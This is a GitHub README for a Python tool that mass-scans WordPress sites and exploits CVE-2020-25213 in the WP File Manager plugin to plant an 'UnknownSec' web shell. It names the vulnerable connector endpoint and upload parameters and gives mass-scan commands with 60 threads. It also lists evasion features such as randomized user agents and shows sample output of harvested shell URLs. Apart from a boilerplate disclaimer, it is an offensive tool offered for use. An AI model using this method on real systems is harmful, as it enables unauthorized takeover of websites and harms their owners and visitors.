Skip to content

Latest commit

 

History

6 Commits

Folders and files

Repository files navigation

Typing SVG

██╗    ██╗██████╗       ███████╗██╗██╗     ███████╗███╗   ███╗ █████╗ ███╗   ██╗ █████╗  ██████╗ ███████╗██████╗ 
██║    ██║██╔══██╗      ██╔════╝██║██║     ██╔════╝████╗ ████║██╔══██╗████╗  ██║██╔══██╗██╔════╝ ██╔════╝██╔══██╗
██║ █╗ ██║██████╔╝█████╗█████╗  ██║██║     █████╗  ██╔████╔██║███████║██╔██╗ ██║███████║██║  ███╗█████╗  ██████╔╝
██║███╗██║██╔═══╝ ╚════╝██╔══╝  ██║██║     ██╔══╝  ██║╚██╔╝██║██╔══██║██║╚██╗██║██╔══██║██║   ██║██╔══╝  ██╔══██╗
╚███╔███╔╝██║           ██║     ██║███████╗███████╗██║ ╚═╝ ██║██║  ██║██║ ╚████║██║  ██║╚██████╔╝███████╗██║  ██║
 ╚══╝╚══╝ ╚═╝           ╚═╝     ╚═╝╚══════╝╚══════╝╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝

WP File Manager — Mass Exploit + UnknownSec Shell Upload


📖 Table of Contents


🔥 Overview

WP File Manager Auto Upload Shell is a mass exploitation tool that detects and exploits CVE-2020-25213 — an unauthenticated arbitrary file upload vulnerability in the WP File Manager WordPress plugin (versions ≤ 6.8), leading to Remote Code Execution via the connector.minimal.php endpoint.

The tool scans a list of WordPress targets, fingerprints the plugin version, and drops an UnknownSec File Manager shell if the target is vulnerable.


🎯 Vulnerability

🔴 CVE 📦 Plugin ⚡ Type 💯 CVSS 🎯 Impact
CVE-2020-25213 WP File Manager ≤ 6.8 Arbitrary File Upload Unauthenticated RCE

🔍 Technical Details

The vulnerability resides in the elFinder connector bundled with the plugin:

/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

The endpoint accepts file uploads without authentication when the plugin ships with the default connector.minimal.php configuration. The cmd=upload parameter combined with the upload[] multipart field writes arbitrary PHP files to lib/files/.


✨ Features

🔍 Detection

  • Deep WordPress fingerprinting
  • Multi-signal version check
  • readme.txt parsing
  • Connector endpoint probe

⚡ Exploit

  • connector.minimal.php upload
  • admin-ajax.php fallback
  • 5 candidate shell paths
  • Strict marker verification

💀 Post-Exploit

  • UnknownSec shell upload
  • RCE verification
  • Auto shell URL save
  • Live counter stats

🎭 OpSec

  • Randomized Chrome UAs
  • Random Referer headers
  • Multithreaded (60+)
  • TLS bypass

📦 Installation

Prerequisites

Python 3.8+
pip (Python package manager)

Quick Install

# Clone the repository
git clone https://github.com/HackfutSecRoot/wordpress-auto-upload-shell.git
cd wordpress-auto-upload-shell

# Install dependencies
pip install -r requirements.txt

requirements.txt

requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

Shell File

⚠️ Place your file.php (UnknownSec shell) in the same directory as the script.

wordpress-auto-upload-shell/
├── wpfm_exploit.py     ← the script
├── file.php            ← ⚠️ YOUR SHELL HERE
└── targets.txt

If file.php is missing, a minimal fallback is auto-generated.


🚀 Usage

🔴 Mass Scan

python wpfm_exploit.py -l targets.txt -t 60

🟢 Single Target

python wpfm_exploit.py -u http://target.com

🔵 Verbose Mode

python wpfm_exploit.py -u http://target.com -v

Arguments

Argument Description Default
-u, --url Single target URL —
-l, --list File with targets (one per line) —
-t, --threads Number of concurrent threads 60
--timeout Per-request timeout (seconds) 15
-o, --output Output directory ./wpfm_RESULTS
-v, --verbose Verbose output False

targets.txt Format

http://target1.com
https://target2.com
target3.com
# comment (ignored)

📂 Project Structure

wordpress-auto-upload-shell/
│
├── 📄 README.md                    # This file
├── 📄 requirements.txt             # Python dependencies
├── 📄 LICENSE                      # MIT License
│
├── 🔴 wpfm_exploit.py              # Main exploit script
├── 💀 file.php                     # UnknownSec shell (next to script)
├── 📄 targets.txt                  # Target list
│
└── 📁 wpfm_RESULTS/                # Auto-generated
    └── shells.txt                  # Uploaded shell URLs

🛠️ How It Works

📊 Exploit Flow

graph TD
    A[Start] --> B{Fingerprint WordPress}
    B -->|No| Z[Skip: not WordPress]
    B -->|Yes| C{Read readme.txt}
    C -->|Not found| D[Probe connector.minimal.php]
    D -->|404| Z2[Skip: FM not installed]
    D -->|200/400/403| E[Assume vulnerable]
    C -->|Found| F{Version < 7.0?}
    F -->|No| Z3[Skip: patched]
    F -->|Yes| E
    E --> G[POST connector.minimal.php]
    G --> H[Upload file.php]
    H --> I{Marker found?}
    I -->|No| J[Try admin-ajax.php]
    J --> I
    I -->|Yes| K[Save shell URL to shells.txt]
    K --> L[Log: Shell Uploaded Successfully]
Loading

🔬 Step-by-Step

  1. WordPress Detection

    • Scans homepage for wp-content/, wp-includes/, wp-json
    • Probes /wp-login.php, /wp-admin/, /wp-json/, /xmlrpc.php
  2. WP File Manager Detection

    • Reads /wp-content/plugins/wp-file-manager/readme.txt
    • Extracts Stable tag: X.Y
    • Falls back to probing connector.minimal.php if readme absent
  3. Version Check

    • Parses version as float
    • Rejects >= 7.0 (patched)
  4. Shell Upload

    • Vector 1: POST to connector.minimal.php with cmd=upload&upload[]=@file.php
    • Vector 2: POST to admin-ajax.php with action=mk_file_folder_manager
  5. Verification

    • GET on 5 candidate paths
    • Checks for marker: UnknownSec Shell / shell bypass 403 / mass deface
    • Only counts as success if marker found

📊 Output Format

Console Output

[14:32:15] - http://target.com/wp-content/plugins/wp-file-manager/lib/files/shell_abc123.php - [Shell Uploaded Successfully]
[14:32:16] - http://target2.com - [Upload Failed]
[14:32:17] - http://target3.com - [FileManager Not Installed]
[14:32:18] - http://target4.com - [Not vuln]

shells.txt

http://target.com/wp-content/plugins/wp-file-manager/lib/files/shell_abc123.php
http://target2.com/wp-content/uploads/shell_xyz789.php

Final Summary

======================================================================
FINAL SUMMARY
======================================================================
  Total targets      : 150
  Shells uploaded    : 12
  Failed             : 138
  Errors             : 0
  Duration           : 45.23s
  Shells saved to    : ./wpfm_RESULTS/shells.txt

VULNERABLE TARGETS:
  [+] http://target.com (v6.8) -> http://target.com/wp-content/plugins/wp-file-manager/lib/files/shell_abc123.php
  [+] http://target2.com (v6.5) -> http://target2.com/wp-content/plugins/wp-file-manager/lib/files/shell_xyz789.php

🎨 Color Scheme

Color ANSI Code Usage
🟢 Green Bold \033[1;32m Shell Uploaded Successfully
🔴 Red Bold \033[1;31m Upload Failed, Not vuln, FileManager Not Installed
🟡 Light Yellow Bold \033[1;33m Timestamp [14:32:15]
⚪ Light White Bold \033[1;37m Target URLs and paths

🧪 Example Run

$ python wpfm_exploit.py -l targets.txt -t 60

██╗    ██╗██████╗       ███████╗██╗██╗     ███████╗███╗   ███╗ █████╗ ███╗   ██╗ █████╗  ██████╗ ███████╗██████╗ 
...banner...

◆ This Tool is Designed to identify vulnerabilities in WordPress installations.
◆ Specifically targeting the WP File Manager plugin (CVE-2020-25213 and others).
◆ It checks for known vulnerabilities and attempts to upload a shell if a vulnerable version is detected.

[14:32:15] - Targets: 150 | Threads: 60 | Timeout: 15s

[14:32:16] - http://target1.com/wp-content/plugins/wp-file-manager/lib/files/shell_abc123.php - [Shell Uploaded Successfully]
[14:32:17] - http://target2.com - [FileManager Not Installed]
[14:32:18] - http://target3.com - [Not vuln]
[14:32:19] - http://target4.com - [Upload Failed]

⚠️ Disclaimer

╔══════════════════════════════════════════════════════════════════╗
║                                                                  ║
║   ☠️  FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING ONLY  ☠️   ║
║                                                                  ║
║   • All tools are provided AS-IS for LAB use                    ║
║   • Use ONLY on systems you own or have WRITTEN permission       ║
║   • Unauthorized access is ILLEGAL and punishable by law         ║
║   • The author is NOT responsible for any misuse                 ║
║                                                                  ║
║   "With great power comes great responsibility."                 ║
║                                                                  ║
╚══════════════════════════════════════════════════════════════════╝

📡 Connect

💀 HackfutSecRoot

📢 Channels

📚 Resources


📜 License

Distributed under the MIT License. See LICENSE for more information.


💀 Made with blood, sweat, and 0days 💀